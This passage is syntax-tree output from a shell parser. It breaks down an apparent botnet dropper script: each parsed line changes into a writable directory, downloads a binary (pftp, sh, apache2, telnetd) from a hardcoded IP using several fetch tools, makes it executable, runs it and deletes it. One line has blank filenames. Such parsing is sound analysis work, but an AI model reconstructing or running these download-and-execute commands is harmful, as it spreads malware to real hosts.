  CommandNode(lineno=10, pos=(2486, 2493), parts=[
    WordNode(lineno=10, pos=(2486, 2488), word='cd'),
    WordNode(lineno=10, pos=(2489, 2493), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2494, 2496)),
  CommandNode(lineno=10, pos=(2497, 2508), parts=[
    WordNode(lineno=10, pos=(2497, 2499), word='cd'),
    WordNode(lineno=10, pos=(2500, 2508), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2509, 2511)),
  CommandNode(lineno=10, pos=(2512, 2519), parts=[
    WordNode(lineno=10, pos=(2512, 2514), word='cd'),
    WordNode(lineno=10, pos=(2515, 2519), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2520, 2522)),
  CommandNode(lineno=10, pos=(2523, 2531), parts=[
    WordNode(lineno=10, pos=(2523, 2525), word='cd'),
    WordNode(lineno=10, pos=(2526, 2531), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(2532, 2534)),
  CommandNode(lineno=10, pos=(2535, 2539), parts=[
    WordNode(lineno=10, pos=(2535, 2537), word='cd'),
    WordNode(lineno=10, pos=(2538, 2539), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2539, 2540)),
  CommandNode(lineno=10, pos=(2541, 2572), parts=[
    WordNode(lineno=10, pos=(2541, 2545), word='wget'),
    WordNode(lineno=10, pos=(2546, 2572), word='http://209.141.37.180/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2572, 2573)),
  CommandNode(lineno=10, pos=(2574, 2608), parts=[
    WordNode(lineno=10, pos=(2574, 2578), word='curl'),
    WordNode(lineno=10, pos=(2579, 2581), word='-O'),
    WordNode(lineno=10, pos=(2582, 2608), word='http://209.141.37.180/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2608, 2609)),
  CommandNode(lineno=10, pos=(2610, 2642), parts=[
    WordNode(lineno=10, pos=(2610, 2615), word='fetch'),
    WordNode(lineno=10, pos=(2616, 2642), word='http://209.141.37.180/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2642, 2643)),
  CommandNode(lineno=10, pos=(2644, 2683), parts=[
    WordNode(lineno=10, pos=(2644, 2656), word='lwp-download'),
    WordNode(lineno=10, pos=(2657, 2683), word='http://209.141.37.180/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2683, 2684)),
  CommandNode(lineno=10, pos=(2685, 2715), parts=[
    WordNode(lineno=10, pos=(2685, 2688), word='GET'),
    WordNode(lineno=10, pos=(2689, 2715), word='http://209.141.37.180/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2715, 2716)),
  CommandNode(lineno=10, pos=(2717, 2756), parts=[
    WordNode(lineno=10, pos=(2717, 2721), word='lynx'),
    WordNode(lineno=10, pos=(2722, 2729), word='-source'),
    WordNode(lineno=10, pos=(2730, 2756), word='http://209.141.37.180/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2756, 2757)),
  CommandNode(lineno=10, pos=(2758, 2771), parts=[
    WordNode(lineno=10, pos=(2758, 2763), word='chmod'),
    WordNode(lineno=10, pos=(2764, 2766), word='+x'),
    WordNode(lineno=10, pos=(2767, 2771), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2771, 2772)),
  CommandNode(lineno=10, pos=(2773, 2779), parts=[
    WordNode(lineno=10, pos=(2773, 2779), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(2779, 2780)),
  CommandNode(lineno=10, pos=(2781, 2792), parts=[
    WordNode(lineno=10, pos=(2781, 2783), word='rm'),
    WordNode(lineno=10, pos=(2784, 2787), word='-rf'),
    WordNode(lineno=10, pos=(2788, 2792), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(2793, 3081), parts=[
  CommandNode(lineno=11, pos=(2793, 2800), parts=[
    WordNode(lineno=11, pos=(2793, 2795), word='cd'),
    WordNode(lineno=11, pos=(2796, 2800), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2801, 2803)),
  CommandNode(lineno=11, pos=(2804, 2815), parts=[
    WordNode(lineno=11, pos=(2804, 2806), word='cd'),
    WordNode(lineno=11, pos=(2807, 2815), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2816, 2818)),
  CommandNode(lineno=11, pos=(2819, 2826), parts=[
    WordNode(lineno=11, pos=(2819, 2821), word='cd'),
    WordNode(lineno=11, pos=(2822, 2826), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2827, 2829)),
  CommandNode(lineno=11, pos=(2830, 2838), parts=[
    WordNode(lineno=11, pos=(2830, 2832), word='cd'),
    WordNode(lineno=11, pos=(2833, 2838), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(2839, 2841)),
  CommandNode(lineno=11, pos=(2842, 2846), parts=[
    WordNode(lineno=11, pos=(2842, 2844), word='cd'),
    WordNode(lineno=11, pos=(2845, 2846), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2846, 2847)),
  CommandNode(lineno=11, pos=(2848, 2877), parts=[
    WordNode(lineno=11, pos=(2848, 2852), word='wget'),
    WordNode(lineno=11, pos=(2853, 2877), word='http://209.141.37.180/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2877, 2878)),
  CommandNode(lineno=11, pos=(2879, 2911), parts=[
    WordNode(lineno=11, pos=(2879, 2883), word='curl'),
    WordNode(lineno=11, pos=(2884, 2886), word='-O'),
    WordNode(lineno=11, pos=(2887, 2911), word='http://209.141.37.180/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2911, 2912)),
  CommandNode(lineno=11, pos=(2913, 2943), parts=[
    WordNode(lineno=11, pos=(2913, 2918), word='fetch'),
    WordNode(lineno=11, pos=(2919, 2943), word='http://209.141.37.180/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2943, 2944)),
  CommandNode(lineno=11, pos=(2945, 2982), parts=[
    WordNode(lineno=11, pos=(2945, 2957), word='lwp-download'),
    WordNode(lineno=11, pos=(2958, 2982), word='http://209.141.37.180/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(2982, 2983)),
  CommandNode(lineno=11, pos=(2984, 3012), parts=[
    WordNode(lineno=11, pos=(2984, 2987), word='GET'),
    WordNode(lineno=11, pos=(2988, 3012), word='http://209.141.37.180/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(3012, 3013)),
  CommandNode(lineno=11, pos=(3014, 3051), parts=[
    WordNode(lineno=11, pos=(3014, 3018), word='lynx'),
    WordNode(lineno=11, pos=(3019, 3026), word='-source'),
    WordNode(lineno=11, pos=(3027, 3051), word='http://209.141.37.180/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(3051, 3052)),
  CommandNode(lineno=11, pos=(3053, 3064), parts=[
    WordNode(lineno=11, pos=(3053, 3058), word='chmod'),
    WordNode(lineno=11, pos=(3059, 3061), word='+x'),
    WordNode(lineno=11, pos=(3062, 3064), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(3064, 3065)),
  CommandNode(lineno=11, pos=(3066, 3070), parts=[
    WordNode(lineno=11, pos=(3066, 3070), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(3070, 3071)),
  CommandNode(lineno=11, pos=(3072, 3081), parts=[
    WordNode(lineno=11, pos=(3072, 3074), word='rm'),
    WordNode(lineno=11, pos=(3075, 3078), word='-rf'),
    WordNode(lineno=11, pos=(3079, 3081), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(3082, 3379), parts=[
  CommandNode(lineno=12, pos=(3082, 3089), parts=[
    WordNode(lineno=12, pos=(3082, 3084), word='cd'),
    WordNode(lineno=12, pos=(3085, 3089), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(3090, 3092)),
  CommandNode(lineno=12, pos=(3093, 3104), parts=[
    WordNode(lineno=12, pos=(3093, 3095), word='cd'),
    WordNode(lineno=12, pos=(3096, 3104), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(3105, 3107)),
  CommandNode(lineno=12, pos=(3108, 3115), parts=[
    WordNode(lineno=12, pos=(3108, 3110), word='cd'),
    WordNode(lineno=12, pos=(3111, 3115), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(3116, 3118)),
  CommandNode(lineno=12, pos=(3119, 3127), parts=[
    WordNode(lineno=12, pos=(3119, 3121), word='cd'),
    WordNode(lineno=12, pos=(3122, 3127), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(3128, 3130)),
  CommandNode(lineno=12, pos=(3131, 3135), parts=[
    WordNode(lineno=12, pos=(3131, 3133), word='cd'),
    WordNode(lineno=12, pos=(3134, 3135), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3135, 3136)),
  CommandNode(lineno=12, pos=(3137, 3167), parts=[
    WordNode(lineno=12, pos=(3137, 3141), word='wget'),
    WordNode(lineno=12, pos=(3142, 3167), word='http://209.141.37.180/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3167, 3168)),
  CommandNode(lineno=12, pos=(3169, 3202), parts=[
    WordNode(lineno=12, pos=(3169, 3173), word='curl'),
    WordNode(lineno=12, pos=(3174, 3176), word='-O'),
    WordNode(lineno=12, pos=(3177, 3202), word='http://209.141.37.180/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3202, 3203)),
  CommandNode(lineno=12, pos=(3204, 3235), parts=[
    WordNode(lineno=12, pos=(3204, 3209), word='fetch'),
    WordNode(lineno=12, pos=(3210, 3235), word='http://209.141.37.180/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3235, 3236)),
  CommandNode(lineno=12, pos=(3237, 3275), parts=[
    WordNode(lineno=12, pos=(3237, 3249), word='lwp-download'),
    WordNode(lineno=12, pos=(3250, 3275), word='http://209.141.37.180/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3275, 3276)),
  CommandNode(lineno=12, pos=(3277, 3306), parts=[
    WordNode(lineno=12, pos=(3277, 3280), word='GET'),
    WordNode(lineno=12, pos=(3281, 3306), word='http://209.141.37.180/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3306, 3307)),
  CommandNode(lineno=12, pos=(3308, 3346), parts=[
    WordNode(lineno=12, pos=(3308, 3312), word='lynx'),
    WordNode(lineno=12, pos=(3313, 3320), word='-source'),
    WordNode(lineno=12, pos=(3321, 3346), word='http://209.141.37.180/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3346, 3347)),
  CommandNode(lineno=12, pos=(3348, 3360), parts=[
    WordNode(lineno=12, pos=(3348, 3353), word='chmod'),
    WordNode(lineno=12, pos=(3354, 3356), word='+x'),
    WordNode(lineno=12, pos=(3357, 3360), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3360, 3361)),
  CommandNode(lineno=12, pos=(3362, 3367), parts=[
    WordNode(lineno=12, pos=(3362, 3367), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(3367, 3368)),
  CommandNode(lineno=12, pos=(3369, 3379), parts=[
    WordNode(lineno=12, pos=(3369, 3371), word='rm'),
    WordNode(lineno=12, pos=(3372, 3375), word='-rf'),
    WordNode(lineno=12, pos=(3376, 3379), word=' '),
  ]),
])
ListNode(lineno=13, pos=(3380, 3713), parts=[
  CommandNode(lineno=13, pos=(3380, 3387), parts=[
    WordNode(lineno=13, pos=(3380, 3382), word='cd'),
    WordNode(lineno=13, pos=(3383, 3387), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3388, 3390)),
  CommandNode(lineno=13, pos=(3391, 3402), parts=[
    WordNode(lineno=13, pos=(3391, 3393), word='cd'),
    WordNode(lineno=13, pos=(3394, 3402), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3403, 3405)),
  CommandNode(lineno=13, pos=(3406, 3413), parts=[
    WordNode(lineno=13, pos=(3406, 3408), word='cd'),
    WordNode(lineno=13, pos=(3409, 3413), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3414, 3416)),
  CommandNode(lineno=13, pos=(3417, 3425), parts=[
    WordNode(lineno=13, pos=(3417, 3419), word='cd'),
    WordNode(lineno=13, pos=(3420, 3425), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(3426, 3428)),
  CommandNode(lineno=13, pos=(3429, 3433), parts=[
    WordNode(lineno=13, pos=(3429, 3431), word='cd'),
    WordNode(lineno=13, pos=(3432, 3433), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3433, 3434)),
  CommandNode(lineno=13, pos=(3435, 3469), parts=[
    WordNode(lineno=13, pos=(3435, 3439), word='wget'),
    WordNode(lineno=13, pos=(3440, 3469), word='http://209.141.37.180/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3469, 3470)),
  CommandNode(lineno=13, pos=(3471, 3508), parts=[
    WordNode(lineno=13, pos=(3471, 3475), word='curl'),
    WordNode(lineno=13, pos=(3476, 3478), word='-O'),
    WordNode(lineno=13, pos=(3479, 3508), word='http://209.141.37.180/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3508, 3509)),
  CommandNode(lineno=13, pos=(3510, 3545), parts=[
    WordNode(lineno=13, pos=(3510, 3515), word='fetch'),
    WordNode(lineno=13, pos=(3516, 3545), word='http://209.141.37.180/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3545, 3546)),
  CommandNode(lineno=13, pos=(3547, 3589), parts=[
    WordNode(lineno=13, pos=(3547, 3559), word='lwp-download'),
    WordNode(lineno=13, pos=(3560, 3589), word='http://209.141.37.180/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3589, 3590)),
  CommandNode(lineno=13, pos=(3591, 3624), parts=[
    WordNode(lineno=13, pos=(3591, 3594), word='GET'),
    WordNode(lineno=13, pos=(3595, 3624), word='http://209.141.37.180/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3624, 3625)),
  CommandNode(lineno=13, pos=(3626, 3668), parts=[
    WordNode(lineno=13, pos=(3626, 3630), word='lynx'),
    WordNode(lineno=13, pos=(3631, 3638), word='-source'),
    WordNode(lineno=13, pos=(3639, 3668), word='http://209.141.37.180/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3668, 3669)),
  CommandNode(lineno=13, pos=(3670, 3686), parts=[
    WordNode(lineno=13, pos=(3670, 3675), word='chmod'),
    WordNode(lineno=13, pos=(3676, 3678), word='+x'),
    WordNode(lineno=13, pos=(3679, 3686), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3686, 3687)),
  CommandNode(lineno=13, pos=(3688, 3697), parts=[
    WordNode(lineno=13, pos=(3688, 3697), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(3697, 3698)),
  CommandNode(lineno=13, pos=(3699, 3713), parts=[
    WordNode(lineno=13, pos=(3699, 3701), word='rm'),
    WordNode(lineno=13, pos=(3702, 3705), word='-rf'),
    WordNode(lineno=13, pos=(3706, 3713), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(3714, 4047), parts=[
  CommandNode(lineno=14, pos=(3714, 3721), parts=[
    WordNode(lineno=14, pos=(3714, 3716), word='cd'),
    WordNode(lineno=14, pos=(3717, 3721), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3722, 3724)),
  CommandNode(lineno=14, pos=(3725, 3736), parts=[
    WordNode(lineno=14, pos=(3725, 3727), word='cd'),
    WordNode(lineno=14, pos=(3728, 3736), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3737, 3739)),
  CommandNode(lineno=14, pos=(3740, 3747), parts=[
    WordNode(lineno=14, pos=(3740, 3742), word='cd'),
    WordNode(lineno=14, pos=(3743, 3747), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3748, 3750)),
  CommandNode(lineno=14, pos=(3751, 3759), parts=[
    WordNode(lineno=14, pos=(3751, 3753), word='cd'),
    WordNode(lineno=14, pos=(3754, 3759), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(3760, 3762)),
  CommandNode(lineno=14, pos=(3763, 3767), parts=[
    WordNode(lineno=14, pos=(3763, 3765), word='cd'),
    WordNode(lineno=14, pos=(3766, 3767), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3767, 3768)),
  CommandNode(lineno=14, pos=(3769, 3803), parts=[
    WordNode(lineno=14, pos=(3769, 3773), word='wget'),
    WordNode(lineno=14, pos=(3774, 3803), word='http://209.141.37.180/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3803, 3804)),
  CommandNode(lineno=14, pos=(3805, 3842), parts=[
    WordNode(lineno=14, pos=(3805, 3809), word='curl'),
    WordNode(lineno=14, pos=(3810, 3812), word='-O'),
    WordNode(lineno=14, pos=(3813, 3842), word='http://209.141.37.180/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3842, 3843)),
  CommandNode(lineno=14, pos=(3844, 3879), parts=[
    WordNode(lineno=14, pos=(3844, 3849), word='fetch'),
    WordNode(lineno=14, pos=(3850, 3879), word='http://209.141.37.180/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3879, 3880)),
  CommandNode(lineno=14, pos=(3881, 3923), parts=[
    WordNode(lineno=14, pos=(3881, 3893), word='lwp-download'),
    WordNode(lineno=14, pos=(3894, 3923), word='http://209.141.37.180/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3923, 3924)),
  CommandNode(lineno=14, pos=(3925, 3958), parts=[
    WordNode(lineno=14, pos=(3925, 3928), word='GET'),
    WordNode(lineno=14, pos=(3929, 3958), word='http://209.141.37.180/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(3958, 3959)),
  CommandNode(lineno=14, pos=(3960, 4002), parts=[
    WordNode(lineno=14, pos=(3960, 3964), word='lynx'),
    WordNode(lineno=14, pos=(3965, 3972), word='-source'),
    WordNode(lineno=14, pos=(3973, 4002), word='http://209.141.37.180/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(4002, 4003)),
  CommandNode(lineno=14, pos=(4004, 4020), parts=[
    WordNode(lineno=14, pos=(4004, 4009), word='chmod'),
    WordNode(lineno=14, pos=(4010, 4012), word='+x'),
    WordNode(lineno=14, pos=(4013, 4020), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(4020, 4021)),
  CommandNode(lineno=14, pos=(4022, 4031), parts=[
    WordNode(lineno=14, pos=(4022, 4031), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(4031, 4032)),
  CommandNode(lineno=14, pos=(4033, 4047), parts=[
    WordNode(lineno=14, pos=(4033, 4035), word='rm'),
    WordNode(lineno=14, pos=(4036, 4039), word='-rf'),
    WordNode(lineno=14, pos=(4040, 4047), word='telnetd'),
  ]),
])
